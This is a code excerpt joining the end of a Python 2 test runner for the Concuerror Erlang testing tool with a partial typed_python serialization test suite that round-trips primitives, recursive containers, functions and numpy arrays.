% (concuerror, dpor_flag, " ".join(files),
rslt, modn, funn, bound, bound_type))
# Compare the results
has_crash = "crash" in flags
orig = "%s/suites/%s/results/%s" % (dirname, suite, txtname)
equalRes = equalResults(suite, name, orig, rslt)
if status != 512 and not has_crash:
finished = True
elif status == 512 and has_crash:
finished = True
else:
finished = False
# Print the results
lock.acquire()
total_tests.value += 1
suitename = re.sub('\_tests$', '', suite)
logline = ("%-8s %-63s"
% (suitename,
name+", "+funn_output+", "+preb_output+", "+dpor_output))
if equalRes and finished:
# We don't need to keep the results file
try:
os.remove(rslt)
except:
pass
print "%s \033[01;32m ok\033[00m" % (logline)
else:
total_failed.value += 1
print "%s \033[01;31mfailed\033[00m" % (logline)
lock.release()
sema.release()
def equalResults(suite, name, orig, rslt):
global dirname
beamdir = "%s/suites/%s/src" % (dirname, suite)
cmd = ("erl -boot start_clean -noinput -pa %s/%s -pa %s"
" -run scenarios exceptional \"%s\" \"%s\" \"%s\""
% (beamdir, name, beamdir, name, orig, rslt))
if 0 == subprocess.call(cmd, shell=True):
return True
else:
return 0 == subprocess.call("bash differ %s %s" % (orig, rslt), shell=True)
#---------------------------------------------------------------------
# Main program
# Get the directory of Concuerror's testsuite
dirname = os.path.abspath(os.path.dirname(sys.argv[0]))
concuerror = os.getenv("CONCUERROR", dirname + "/../bin/concuerror")
results = os.path.abspath(dirname + "/results")
# Ensure made
assert 0 == os.system("%s --version" % (concuerror))
assert 0 == os.system("erlc scenarios.erl")
# If we have arguments we should use them as tests,
# otherwise check them all
if len(sys.argv) > 1:
tests = sys.argv[1:]
tests = [os.path.abspath(item) for item in tests]
else:
tests = glob.glob(dirname + "/suites/*/src/*")
# How many threads we want (default, number of CPUs in the system)
threads = os.getenv("THREADS", "")
if threads == "":
try:
threads = str(max(1, cpu_count() - 1))
except:
threads = "1"
# Print header
print "Concuerror's Testsuite (THREADS=%d)\n" % int(threads)
print "%-8s %-63s %s" % \
("Suite", "Module, Test (' '=Module), Bound (' '=inf), DPOR (' '=optimal)", "Result")
print "-------------------------------------------------------------------------------"
# Create share integers to count tests and
# a lock to protect printings
lock = Lock()
total_tests = Value(c_int, 0, lock=False)
total_failed = Value(c_int, 0, lock=False)
sema = BoundedSemaphore(int(threads))
sema1 = BoundedSemaphore(int(threads))
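# Two throttles: sema1 bounds how many test modules are compiled/extracted at
# once (runTest), while sema bounds how many individual scenarios run
# concurrently (runScenario); both are sized to THREADS.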
# For every test do
procT = []
for test in tests:
p = Process(target=runTest, args=(test,))
procT.append(p)
sema1.acquire()
p.start()
# Wait
for p in procT:
p.join()
# Print overview
print "\nOVERALL SUMMARY for test run"
print " %d total tests, which contained" % len(tests)
print " %d scenarios, of which" % total_tests.value
print " %d caused unexpected failures!" % total_failed.value
if total_failed.value != 0:
exit(1)
|
types_serialization_test.py
|
# Copyright 2017-2019 typed_python Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import os
import importlib
from abc import ABC, abstractmethod, ABCMeta
from typed_python.test_util import callFunctionInFreshProcess
import typed_python.compiler.python_ast_util as python_ast_util
import threading
import textwrap
import time
import unittest
import numpy
import numpy.linalg
import datetime
import pytest
import pytz
import gc
import pprint
import tempfile
import types
import typed_python.dummy_test_module as dummy_test_module
import typed_python.compiler.native_ast as native_ast
from typed_python.compiler.native_ast import Expression, NamedCallTarget
from typed_python.test_util import currentMemUsageMb
from typed_python.SerializationContext import createFunctionWithLocalsAndGlobals
from typed_python import (
TupleOf, ListOf, OneOf, Tuple, NamedTuple, Class,
Member, ConstDict, Alternative, serialize, deserialize,
Dict, Set, SerializationContext, EmbeddedMessage,
serializeStream, deserializeStream, decodeSerializedObject,
Forward, Final, Function, Entrypoint, TypeFunction, PointerTo,
SubclassOf
)
from typed_python._types import (
refcount, isRecursive, identityHash, buildPyFunctionObject,
setFunctionClosure, typesAreEquivalent, recursiveTypeGroupDeepRepr
)
module_level_testfun = dummy_test_module.testfunction
def moduleLevelFunctionUsedByExactlyOneSerializationTest():
return "please don't touch me"
def moduleLevelRecursiveF(x):
if x > 0:
return moduleLevelRecursiveF(x - 1) + 1
return 0
@Entrypoint
def moduleLevelEntrypointedFunction(x):
return x + 1
ModuleLevelAlternative = Alternative(
"ModuleLevelAlternative",
X={'a': int},
Y={'b': float}
)
class ModuleLevelNormalClass:
def method(self):
pass
class ModuleLevelNamedTupleSubclass(NamedTuple(x=int)):
def f(self):
return self.x
class ModuleLevelClass(Class, Final):
def f(self):
return "HI!"
def moduleLevelIdentityFunction(x):
return x
ModuleLevelRecursiveForward = Forward("ModuleLevelRecursiveForward")
ModuleLevelRecursiveForward = ModuleLevelRecursiveForward.define(
ConstDict(int, OneOf(None, ModuleLevelRecursiveForward))
)
moduleLevelDict = Dict(int, int)()
def moduleLevelDictGetter(x):
def f():
return (moduleLevelDict, x)
return f
class C:
def __eq__(self, other):
return self.__dict__ == other.__dict__
class D(C):
def __init__(self, arg):
pass
class E(C):
def __getinitargs__(self):
return ()
class H:
pass
# Hashable mutable key
class K:
def __init__(self, value):
self.value = value
def __reduce__(self):
# Shouldn't support the recursion itself
return K, (self.value,)
import __main__ # noqa: E402
__main__.C = C
C.__module__ = "__main__"
__main__.D = D
D.__module__ = "__main__"
__main__.E = E
E.__module__ = "__main__"
__main__.H = H
H.__module__ = "__main__"
__main__.K = K
K.__module__ = "__main__"
class myint(int):
def __init__(self, x):
self.str = str(x)
class initarg(C):
def __init__(self, a, b):
self.a = a
self.b = b
def __getinitargs__(self):
return self.a, self.b
class metaclass(type):
pass
class use_metaclass(object, metaclass=metaclass):
pass
class pickling_metaclass(type):
def __eq__(self, other):
return (type(self) == type(other) and
self.reduce_args == other.reduce_args)
def __reduce__(self):
return (create_dynamic_class, self.reduce_args)
def create_dynamic_class(name, bases):
result = pickling_metaclass(name, bases, dict())
result.reduce_args = (name, bases)
return result
def create_data():
c = C()
c.foo = 1
c.bar = 2
# TODO: add support for complex numbers
# x = [0, 1, 2.0, 3.0+0j]
x = [0, 1, 2.0]
# Append some integer test cases at cPickle.c's internal size
# cutoffs.
uint1max = 0xff
uint2max = 0xffff
int4max = 0x7fffffff
x.extend([1, -1,
uint1max, -uint1max, -uint1max-1,
uint2max, -uint2max, -uint2max-1,
int4max, -int4max, -int4max-1])
y = ('abc', 'abc', c, c)
x.append(y)
x.append(y)
x.append(5)
return x
# Test classes for newobj
class MyInt(int):
sample = 1
class MyFloat(float):
sample = 1.0
class MyComplex(complex):
sample = 1.0 + 0.0j
class MyStr(str):
sample = "hello"
class MyUnicode(str):
sample = "hello \u1234"
class MyBytes(bytes):
sample = b"hello"
class MyTuple(tuple):
sample = (1, 2, 3)
class MyList(list):
sample = [1, 2, 3]
class MyDict(dict):
sample = {"a": 1, "b": 2}
class MySet(set):
sample = {"a", "b"}
class MyFrozenSet(frozenset):
sample = frozenset({"a", "b"})
myclasses = [MyInt, MyFloat,
MyComplex,
MyStr, MyUnicode,
MyTuple, MyList, MyDict, MySet, MyFrozenSet]
REDUCE_A = 'reduce_A'
class AAA:
def __reduce__(self):
return str, (REDUCE_A,)
sc = SerializationContext({
'initarg': initarg,
'C': C,
'D': D,
'E': E,
'H': H,
'K': K,
'MyInt': MyInt,
'MyFloat': MyFloat,
'MyComplex': MyComplex,
'MyStr': MyStr,
'MyUnicode': MyUnicode,
'MyBytes': MyBytes,
'MyTuple': MyTuple,
'MyList': MyList,
'MyDict': MyDict,
'MySet': MySet,
'MyFrozenSet': MyFrozenSet,
'use_metaclass': use_metaclass,
'metaclass': metaclass,
'pickling_metaclass': pickling_metaclass,
'AAA': AAA,
})
@TypeFunction
def FancyClass(T):
class FancyClass_(Class, Final):
__name__ = "FancyClass(" + T.__name__ + ")"
def f(self):
return 1
return FancyClass_
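# Round-trip helper: serialize then deserialize with compression disabled,
# presumably so a failing payload can be dumped with decodeSerializedObject
# for inspection.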
def ping_pong(obj, serialization_context=None):
serialization_context = serialization_context or SerializationContext()
s = serialization_context.withoutCompression().serialize(obj)
try:
return serialization_context.withoutCompression().deserialize(s)
except Exception:
print("FAILED TO DESERIALIZE:")
print(s)
pprint.PrettyPrinter(indent=2).pprint(decodeSerializedObject(s))
raise
class TypesSerializationTest(unittest.TestCase):
def assert_is_copy(self, obj, objcopy, msg=None):
"""Utility method to verify if two objects are copies of each others.
"""
if msg is None:
msg = "{!r} is not a copy of {!r}".format(obj, objcopy)
self.assertEqual(obj, objcopy, msg=msg)
self.assertIs(type(obj), type(objcopy), msg=msg)
if hasattr(obj, '__dict__'):
if isinstance(obj.__dict__, dict):
self.assertDictEqual(obj.__dict__, objcopy.__dict__, msg=msg)
self.assertIsNot(obj.__dict__, objcopy.__dict__, msg=msg)
if hasattr(obj, '__slots__'):
self.assertListEqual(obj.__slots__, objcopy.__slots__, msg=msg)
for slot in obj.__slots__:
self.assertEqual(
hasattr(obj, slot), hasattr(objcopy, slot), msg=msg)
self.assertEqual(getattr(obj, slot, None),
getattr(objcopy, slot, None), msg=msg)
def check_idempotence(self, obj, ser_ctx=None):
ser_ctx = ser_ctx or SerializationContext()
self.assert_is_copy(obj, ping_pong(obj, ser_ctx))
def test_serialize_core_python_objects(self):
self.check_idempotence(0)
self.check_idempotence(10)
self.check_idempotence(-10)
self.check_idempotence(-0.0)
self.check_idempotence(0.0)
self.check_idempotence(10.5)
self.check_idempotence(-10.5)
self.check_idempotence(None)
self.check_idempotence(True)
self.check_idempotence(False)
self.check_idempotence("")
self.check_idempotence("a string")
self.check_idempotence(b"")
self.check_idempotence(b"some bytes")
self.check_idempotence(())
self.check_idempotence((1,))
self.check_idempotence([])
self.check_idempotence({})
self.check_idempotence({"key": "value"})
self.check_idempotence({"key": "value", "key2": "value2"})
self.check_idempotence([])
self.check_idempotence([1, 2, 3])
self.check_idempotence(set())
self.check_idempotence({1, 2, 3})
self.check_idempotence(frozenset())
self.check_idempotence(frozenset({1, 2, 3}))
self.check_idempotence(int)
self.check_idempotence(object)
self.check_idempotence(type)
self.check_idempotence(TupleOf(int))
self.check_idempotence(TupleOf(int)([0x08]))
def test_serialize_python_dict(self):
d = {1: 2, 3: '4', '5': 6, 7.0: b'8'}
self.check_idempotence(d)
def test_serialize_recursive_list(self):
def check_reclist(size):
init = list(range(size))
reclist = list(init)
reclist.append(reclist)
alt_reclist = ping_pong(reclist)
for i in range(size):
self.assertEqual(init[i], alt_reclist[i])
self.assertEqual(reclist[i], alt_reclist[i])
self.assertIs(alt_reclist[size], alt_reclist)
for i in range(4):
check_reclist(i)
def test_serialize_memoizes_tuples(self):
ts = SerializationContext()
lst = (1, 2, 3)
for i in range(100):
lst = (lst, lst)
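# After i iterations lst conceptually has 2**(i+1) leaves but only i+1
# distinct tuple objects, so memoized serialization should stay roughly
# linear in i, which the bound below checks.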
self.assertTrue(len(ts.serialize(lst)) < (i+1) * 100)
def test_serialize_objects(self):
class AnObject:
def __init__(self, o):
self.o = o
ts = SerializationContext({'O': AnObject})
o = AnObject(123)
o2 = ping_pong(o, ts)
self.assertIsInstance(o2, AnObject)
self.assertEqual(o2.o, 123)
def test_serialize_stream_integers(self):
for someInts in [(1, 2), TupleOf(int)((1, 2)), [1, 2]]:
self.assertEqual(
serializeStream(int, someInts),
b"".join([serialize(int, x) for x in someInts])
)
self.assertEqual(
deserializeStream(int, serializeStream(int, someInts)),
TupleOf(int)(someInts)
)
def test_serialize_stream_complex(self):
T = OneOf(None, float, str, int, ListOf(int))
for items in [
(1, 2),
("hi", None, 10, ListOf(int)([1, 2, 3, 4])),
()]:
self.assertEqual(
serializeStream(T, [T(x) for x in items]),
b"".join([serialize(T, x) for x in items])
)
self.assertEqual(
deserializeStream(T, serializeStream(T, [T(x) for x in items])),
TupleOf(T)([T(x) for x in items])
)
def test_serialize_recursive_object(self):
class AnObject:
def __init__(self, o):
self.o = o
ts = SerializationContext({'O': AnObject})
o = AnObject(None)
o.o = o
o2 = ping_pong(o, ts)
self.assertIs(o2.o, o2)
def test_serialize_primitive_native_types(self):
for t in [int, float, bool, type(None), str, bytes]:
self.assertIs(ping_pong(t), t)
def test_serialize_primitive_compound_types(self):
class A:
pass
B = Alternative("B", X={'a': A})
ts = SerializationContext({'A': A, 'B': B})
for t in [ ConstDict(int, float),
NamedTuple(x=int, y=str),
TupleOf(bool),
Tuple(int, int, bool),
OneOf(int, float),
OneOf(1, 2, 3, "hi", b"goodbye"),
TupleOf(NamedTuple(x=int)),
TupleOf(object),
TupleOf(A),
TupleOf(B)
]:
self.assertIs(ping_pong(t, ts), t)
def test_serialize_functions_basic(self):
def f():
return 10
ts = SerializationContext({'f': f})
self.assertIs(ping_pong(f, ts), f)
def test_serialize_alternatives_as_types(self):
A = Forward("A")
A = A.define(Alternative("A", X={'a': int}, Y={'a': A}))
ts = SerializationContext({'A': A})
self.assertIs(ping_pong(A, ts), A)
self.assertIs(ping_pong(A.X, ts), A.X)
def test_serialize_lambdas(self):
def check(f, args):
self.assertEqual(f(*args), ping_pong(f)(*args))
y = 20
def f(x):
return x + 1
def f2(x):
return x + y
check(f, (10,))
check(f2, (10,))
check(lambda x: x+1, (10,))
check(lambda x: (x, True, False), (10,))
check(lambda x: (x, "hi"), (10,))
check(lambda x: (x, None), (10,))
check(lambda x: x+y, (10,))
def test_serialize_class_instance(self):
class A:
def __init__(self, x):
self.x = x
def f(self):
return b"an embedded string"
ts = SerializationContext({'A': A})
serialization = ts.serialize(A(10))
self.assertTrue(b'an embedded string' not in serialization)
anA = ts.deserialize(serialization)
self.assertEqual(anA.x, 10)
anA2 = deserialize(A, serialize(A, A(10), ts), ts)
self.assertEqual(anA2.x, 10)
def test_serialize_and_numpy(self):
x = numpy.ones(10000)
ts = SerializationContext()
self.assertTrue(numpy.all(x == ts.deserialize(ts.serialize(x))))
sizeCompressed = len(ts.serialize(x))
ts.compressionEnabled = False
self.assertTrue(numpy.all(x == ts.deserialize(ts.serialize(x))))
sizeNotCompressed = len(ts.serialize(x))
self.assertTrue(sizeNotCompressed > sizeCompressed * 2, (sizeNotCompressed, sizeCompressed))
def test_serialize_and_numpy_with_dicts(self):
x = numpy.ones(10000)
self.assertTrue(numpy.all(ping_pong({'a': x, 'b': x})['a'] == x))
def test_serialize_and_threads(self):
class A:
def __init__(self, x):
self.x = x
ts = SerializationContext({'A': A})
OK = []
def thread():
t0 = time.time()
while time.time() - t0 < 1.0:
ping_pong(A(10), ts)
OK.append(True)
threads = [threading.Thread(target=thread) for _ in range(10)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertEqual(len(OK), len(threads))
def test_serialize_named_tuple(self):
X = NamedTuple(x=int)
self.check_idempotence(X(x=20))
def test_serialize_named_tuple_subclass(self):
class X(NamedTuple(x=int)):
def f(self):
return self.x
ts = SerializationContext({'X': X})
self.assertIs(ping_pong(X, ts), X)
self.assertTrue(ts.serialize(X(x=20)) != ts.serialize(X(x=21)))
self.check_idempotence(X(x=20), ts)
def test_serialization_context_queries(self):
sc = SerializationContext({
'X': False,
'Y': True,
})
self.assertIs(sc.objectFromName('X'), False)
self.assertIs(sc.nameForObject(False), 'X')
self.assertIs(sc.objectFromName('Y'), True)
self.assertIs(sc.nameForObject(True), 'Y')
def test_serializing_dicts_in_loop(self):
self.serializeInLoop(lambda: 1)
self.serializeInLoop(lambda: {})
self.serializeInLoop(lambda: {1: 2})
self.serializeInLoop(lambda: {1: {2: 3}})
def test_serializing_tuples_in_loop(self):
self.serializeInLoop(lambda: ())
self.serializeInLoop(lambda: (1, 2, 3))
self.serializeInLoop(lambda: (1, 2, (3, 4,), ((5, 6), (((6,),),))))
def test_serializing_lists_in_loop(self):
self.serializeInLoop(lambda: [])
self.serializeInLoop(lambda: [1, 2, 3, 4])
self.serializeInLoop(lambda: [1, 2, [3, 4, 5], [6, [[[[]]]]]])
def test_serializing_objects_in_loop(self):
class X:
def __init__(self, a=None, b=None, c=None):
self.a = a
self.b = b
self.c = c
c = SerializationContext({'X': X})
self.serializeInLoop(lambda: X(a=X(), b=[1, 2, 3], c=X(a=X())), context=c)
def test_serializing_numpy_arrays_in_loop(self):
self.serializeInLoop(lambda: numpy.array([]))
self.serializeInLoop(lambda: numpy.array([1, 2, 3]))
self.serializeInLoop(lambda: numpy.array([[1, 2, 3], [2, 3, 4]]))
self.serializeInLoop(lambda: numpy.ones(2000))
def test_serializing_anonymous_recursive_types(self):
NT = Forward("NT")
NT = NT.define(TupleOf(OneOf(int, NT)))
NT2 = ping_pong(NT)
# verify we can construct these objects
nt2 = NT2((1, 2, 3))
NT2((nt2, 2))
def test_serializing_named_tuples_in_loop(self):
NT = Forward("NT")
NT = NT.define(NamedTuple(x=OneOf(int, float), y=OneOf(int, TupleOf(NT))))
context = SerializationContext({'NT': NT})
self.serializeInLoop(lambda: NT(x=10, y=(NT(x=20, y=2),)), context=context)
def test_serializing_tuple_of_in_loop(self):
TO = TupleOf(int)
context = SerializationContext({'TO': TO})
self.serializeInLoop(lambda: TO((1, 2, 3, 4, 5)), context=context)
def test_serializing_alternatives_in_loop(self):
AT = Forward("AT")
AT = AT.define(Alternative("AT", X={'x': int, 'y': float}, Y={'x': int, 'y': AT}))
context = SerializationContext({'AT': AT}).withoutCompression()
self.serializeInLoop(lambda: AT, context=context)
self.serializeInLoop(lambda: AT.Y, context=context)
self.serializeInLoop(lambda: AT.X(x=10, y=20), context=context)
def test_inject_exception_into_context(self):
NT = NamedTuple()
context = SerializationContext({'NT': NT})
context2 = SerializationContext({'NT': NT})
def throws(*args):
raise Exception("Test Exception")
context.nameForObject = throws
context2.objectFromName = throws
with self.assertRaisesRegex(Exception, "Test Exception"):
context.serialize(NT)
data = context2.serialize(NT)
with self.assertRaisesRegex(Exception, "Test Exception"):
context2.deserialize(data)
def serializeInLoop(self, objectMaker, context=None):
# this test fails on macos for some reason
if sys.platform == "darwin":
return
context = context or SerializationContext()
memUsage = currentMemUsageMb()
t0 = time.time()
data = context.serialize(objectMaker())
while time.time() - t0 < .25:
context.deserialize(data)
gc.collect()
self.assertLess(currentMemUsageMb() - memUsage, 1.0)
##########################################################################
# The Tests below are Adapted from pickletester.py in cpython/Lib/test
def test_serialize_roundtrip_equality(self):
expected = create_data()
got = ping_pong(expected, sc)
self.assert_is_copy(expected, got)
def test_serialize_recursive_tuple_and_list(self):
t = ([],)
t[0].append(t)
x = ping_pong(t)
self.assertIsInstance(x, tuple)
self.assertEqual(len(x), 1)
self.assertIsInstance(x[0], list)
self.assertEqual(len(x[0]), 1)
self.assertIs(x[0][0], x)
def test_serialize_recursive_dict(self):
d = {}
d[1] = d
x = ping_pong(d)
self.assertIsInstance(x, dict)
self.assertEqual(list(x.keys()), [1])
self.assertIs(x[1], x)
def test_serialize_recursive_dict_key(self):
d = {}
k = K(d)
d[k] = 1
x = ping_pong(d, sc)
self.assertIsInstance(x, dict)
self.assertEqual(len(x.keys()), 1)
self.assertIsInstance(list(x.keys())[0], K)
self.assertIs(list(x.keys())[0].value, x)
def test_serialize_recursive_set(self):
y = set()
k = K(y)
y.add(k)
x = ping_pong(y, sc)
self.assertIsInstance(x, set)
self.assertEqual(len(x), 1)
self.assertIsInstance(list(x)[0], K)
self.assertIs(list(x)[0].value, x)
def test_serialize_recursive_inst(self):
i = C()
i.attr = i
x = ping_pong(i, sc)
self.assertIsInstance(x, C)
self.assertEqual(dir(x), dir(i))
self.assertIs(x.attr, x)
def test_serialize_recursive_multi(self):
lst = []
d = {1: lst}
i = C()
i.attr = d
lst.append(i)
x = ping_pong(lst, sc)
self.assertIsInstance(x, list)
self.assertEqual(len(x), 1)
self.assertEqual(dir(x[0]), dir(i))
self.assertEqual(list(x[0].attr.keys()), [1])
self.assertTrue(x[0].attr[1] is x)
def check_recursive_collection_and_inst(self, factory):
h = H()
y = factory([h])
h.attr = y
x = ping_pong(y, sc)
self.assertIsInstance(x, type(y))
self.assertEqual(len(x), 1)
self.assertIsInstance(list(x)[0], H)
self.assertIs(list(x)[0].attr, x)
def test_serialize_recursive_list_and_inst(self):
self.check_recursive_collection_and_inst(list)
def test_serialize_recursive_tuple_and_inst(self):
self.check_recursive_collection_and_inst(tuple)
def test_serialize_recursive_dict_and_inst(self):
self.check_recursive_collection_and_inst(dict.fromkeys)
def test_serialize_recursive_set_and_inst(self):
self.check_recursive_collection_and_inst(set)
def test_serialize_recursive_frozenset_and_inst(self):
self.check_recursive_collection_and_inst(frozenset)
def test_serialize_base_type_subclass(self):
assert sc.deserialize(sc.serialize(MyInt())) == MyInt()
assert sc.deserialize(sc.serialize(MyFloat())) == MyFloat()
assert sc.deserialize(sc.serialize(MyComplex())) == MyComplex()
assert sc.deserialize(sc.serialize(MyStr())) == MyStr()
assert sc.deserialize(sc.serialize(MyUnicode())) == MyUnicode()
assert sc.deserialize(sc.serialize(MyBytes())) == MyBytes()
assert sc.deserialize(sc.serialize(MyTuple())) == MyTuple()
assert sc.deserialize(sc.serialize(MyList())) == MyList()
assert sc.deserialize(sc.serialize(MyDict())) == MyDict()
assert sc.deserialize(sc.serialize(MySet())) == MySet()
assert sc.deserialize(sc.serialize(MyFrozenSet())) == MyFrozenSet()
def test_serialize_unicode_1(self):
endcases = ['', '<\\u>', '<\\\u1234>', '<\n>',
'<\\>', '<\\\U00012345>']
for u in endcases:
print("u = {}".format(u))
u2 = ping_pong(u)
self.assert_is_copy(u, u2)
def test_serialize_unicode_high_plane(self):
t = '\U00012345'
t2 = ping_pong(t)
self.assert_is_copy(t, t2)
def test_serialize_bytes(self):
for s in b'', b'xyz', b'xyz'*100:
s2 = ping_pong(s)
self.assert_is_copy(s, s2)
for s in [bytes([i]) for i in range(256)]:
s2 = ping_pong(s)
self.assert_is_copy(s, s2)
for s in [bytes([i, i]) for i in range(256)]:
s2 = ping_pong(s)
self.assert_is_copy(s, s2)
def test_serialize_ints(self):
n = sys.maxsize
while n:
for expected in (-n, n):
n2 = ping_pong(expected)
self.assert_is_copy(expected, n2)
n = n >> 1
def test_serialize_float(self):
test_values = [0.0, 4.94e-324, 1e-310, 7e-308, 6.626e-34, 0.1, 0.5,
3.14, 263.44582062374053, 6.022e23, 1e30]
test_values = test_values + [-x for x in test_values]
for value in test_values:
got = ping_pong(value)
self.assert_is_copy(value, got)
def test_serialize_numpy_float(self):
deserializedVal = ping_pong(numpy.float64(1.0))
self.assertEqual(deserializedVal, 1.0)
self.assertIsInstance(deserializedVal, numpy.float64)
def test_serialize_reduce(self):
inst = AAA()
loaded = ping_pong(inst, sc)
self.assertEqual(loaded, REDUCE_A)
def test_serialize_getinitargs(self):
inst = initarg(1, 2)
loaded = ping_pong(inst)
self.assert_is_copy(inst, loaded)
def test_serialize_metaclass(self):
a = use_metaclass()
b = ping_pong(a, sc)
self.assertEqual(a.__class__, b.__class__)
@pytest.mark.skip(reason="Didn't even bother")
def test_serialize_dynamic_class(self):
import copyreg
a = create_dynamic_class("my_dynamic_class", (object,))
copyreg.pickle(pickling_metaclass, pickling_metaclass.__reduce__)
b = ping_pong(a)
self.assertEqual(a, b)
self.assertIs(type(a), type(b))
def test_class_serialization_stable(self):
class C:
pass
s = SerializationContext()
CSer = s.serialize(C)
s.serialize(C())
CSer2 = s.serialize(C)
assert CSer == CSer2
@pytest.mark.skip(reason="Fails on 3.8 for some reason")
def test_serialize_structseq(self):
import time
import os
t = time.localtime()
u = ping_pong(t)
self.assert_is_copy(t, u)
if hasattr(os, "stat"):
t = os.stat(os.curdir)
u = ping_pong(t)
self.assert_is_copy(t, u)
if hasattr(os, "statvfs"):
t = os.statvfs(os.curdir)
u = ping_pong(t)
self.assert_is_copy(t, u)
def test_serialize_ellipsis(self):
u = ping_pong(...)
self.assertIs(..., u)
def test_serialize_notimplemented(self):
u = ping_pong(NotImplemented)
self.assertIs(NotImplemented, u)
def test_serialize_singleton_types(self):
# Issue #6477: Test that types of built-in singletons can be pickled.
singletons = [None, ..., NotImplemented]
for singleton in singletons:
u = ping_pong(type(singleton))
self.assertIs(type(singleton), u)
def test_serialize_many_puts_and_gets(self):
# Test that internal data structures correctly deal with lots of
# puts/gets.
keys = ("aaa" + str(i) for i in range(100))
large_dict = dict((k, [4, 5, 6]) for k in keys)
obj = [dict(large_dict), dict(large_dict), dict(large_dict)]
loaded = ping_pong(obj)
self.assert_is_copy(obj, loaded)
def test_serialize_attribute_name_interning(self):
# Test that attribute names of pickled objects are interned when
# unpickling.
x = C()
x.foo = 42
x.bar = "hello"
y = ping_pong(x, sc)
x_keys = sorted(x.__dict__)
y_keys = sorted(y.__dict__)
for x_key, y_key in zip(x_keys, y_keys):
self.assertIs(x_key, y_key)
def test_serialize_large_pickles(self):
# Test the correctness of internal buffering routines when handling
# large data.
data = (1, min, b'xy' * (30 * 1024), len)
loaded = ping_pong(data, sc)
self.assertEqual(len(loaded), len(data))
self.assertEqual(loaded, data)
def test_serialize_nested_names(self):
global Nested
class Nested:
class A:
class B:
class C:
pass
sc = SerializationContext({
'Nested': Nested,
'Nested.A': Nested.A,
'Nested.A.B': Nested.A.B,
'Nested.A.B.C': Nested.A.B.C
})
for obj in [Nested.A, Nested.A.B, Nested.A.B.C]:
with self.subTest(obj=obj):
unpickled = ping_pong(obj, sc)
self.assertIs(obj, unpickled)
def test_serialize_lambdas_more(self):
sc = SerializationContext()
with tempfile.TemporaryDirectory() as tf:
fpath = os.path.join(tf, "weird_serialization_test.py")
with open(fpath, "w") as f:
f.write("def f(x):\n return x + 1\n")
sys.path.append(tf)
m = importlib.import_module('weird_serialization_test')
# verify we can serialize this
deserialized_f = sc.deserialize(sc.serialize(m.f))
self.assertEqual(deserialized_f(10), 11)
assert not os.path.exists(fpath)
python_ast_util.clearAllCaches()
# at this point, the backing data for serialization is not there
# and also, the cache is cleared.
deserialized_f_2 = sc.deserialize(sc.serialize(deserialized_f))
self.assertEqual(deserialized_f_2(10), 11)
def test_serialize_result_of_decorator(self):
sc = SerializationContext()
def decorator(f):
def addsOne(x):
return f(x) + 1
return addsOne
@decorator
def g(x):
return x + 1
g2 = sc.deserialize(sc.serialize(g))
self.assertEqual(g2(10), g(10))
def test_serialize_modules(self):
sc = SerializationContext()
self.assertIs(pytz, sc.deserialize(sc.serialize(pytz)))
def test_serialize_submodules(self):
sc = SerializationContext()
self.assertEqual(
sc.deserialize(sc.serialize(numpy.linalg)),
numpy.linalg
)
def test_serialize_functions_with_references_in_list_comprehensions(self):
sc = SerializationContext()
# note that it matters that the 'module_level_testfun' is at the module level,
# because that induces a freevar in a list-comprehension code object
def f():
return [module_level_testfun() for _ in range(1)][0]
self.assertEqual(f(), "testfunction")
self.assertEqual(sc.deserialize(sc.serialize(f))(), "testfunction")
def test_serialize_functions_with_nested_list_comprehensions(self):
sc = SerializationContext()
def f():
return [[z for z in range(20)] for _ in range(1)]
self.assertEqual(sc.deserialize(sc.serialize(f))(), f())
def test_serialize_lambdas_with_nested_list_comprehensions(self):
sc = SerializationContext()
f = lambda: [[z for z in range(20)] for _ in range(1)]
self.assertEqual(sc.deserialize(sc.serialize(f))(), f())
def test_serialize_large_lists(self):
x = SerializationContext()
lst = ListOf(ListOf(int))()
lst.resize(100)
for sublist in lst:
sublist.resize(1000000)
t0 = time.time()
l2 = x.deserialize(x.serialize(lst))
print(time.time() - t0, " to roundtrip")
self.assertEqual(lst, l2)
def test_serialize_large_numpy_arrays(self):
x = SerializationContext()
a = numpy.arange(100000000)
a2 = x.deserialize(x.serialize(a))
self.assertTrue(numpy.all(a == a2))
def test_serialize_datetime_objects(self):
x = SerializationContext()
d = datetime.date.today()
d2 = x.deserialize(x.serialize(d))
self.assertEqual(d, d2, (d, type(d)))
d = datetime.datetime.now()
d2 = x.deserialize(x.serialize(d))
self.assertEqual(d, d2, (d, type(d)))
d = datetime.timedelta(days=1)
d2 = x.deserialize(x.serialize(d))
self.assertEqual(d, d2, (d, type(d)))
d = datetime.datetime.now().time()
d2 = x.deserialize(x.serialize(d))
self.assertEqual(d, d2, (d, type(d)))
d = pytz.timezone("America/New_York")
d2 = x.deserialize(x.serialize(d))
self.assertEqual(d, d2, (d, type(d)))
d = pytz.timezone("America/New_York").localize(datetime.datetime.now())
d2 = x.deserialize(x.serialize(d))
self.assertEqual(d, d2, (d, type(d)))
def test_serialize_dict(self):
x = SerializationContext()
d = Dict(str, str)()
d["hi"] = "hi"
d["a"] = "a"
d2 = x.deserialize(x.serialize(d))
self.assertEqual(d, d2)
def test_serialize_set(self):
x = SerializationContext()
s = Set(str)()
self.assertEqual(s, x.deserialize(x.serialize(s)))
s.add("hi")
self.assertEqual(s, x.deserialize(x.serialize(s)))
s.add("bye")
self.assertEqual(s, x.deserialize(x.serialize(s)))
s.clear()
self.assertEqual(s, x.deserialize(x.serialize(s)))
def test_serialize_recursive_dict_more(self):
D = Forward("D")
D = D.define(Dict(str, OneOf(str, D)))
x = SerializationContext({"D": D})
d = D()
d["hi"] = "bye"
d["recurses"] = d
d2 = x.deserialize(x.serialize(d))
self.assertEqual(d2['recurses']['recurses']['hi'], 'bye')
@pytest.mark.skipif('sys.platform=="darwin"')
def test_serialize_dict_doesnt_leak(self):
T = Dict(int, int)
d = T({i: i+1 for i in range(100)})
x = SerializationContext()
assert not isRecursive(T)
usage = currentMemUsageMb()
for _ in range(20000):
x.deserialize(x.serialize(d))
self.assertLess(currentMemUsageMb(), usage+1)
@pytest.mark.skipif('sys.platform=="darwin"')
def test_serialize_array_doesnt_leak(self):
d = numpy.ones(1000000)
x = SerializationContext()
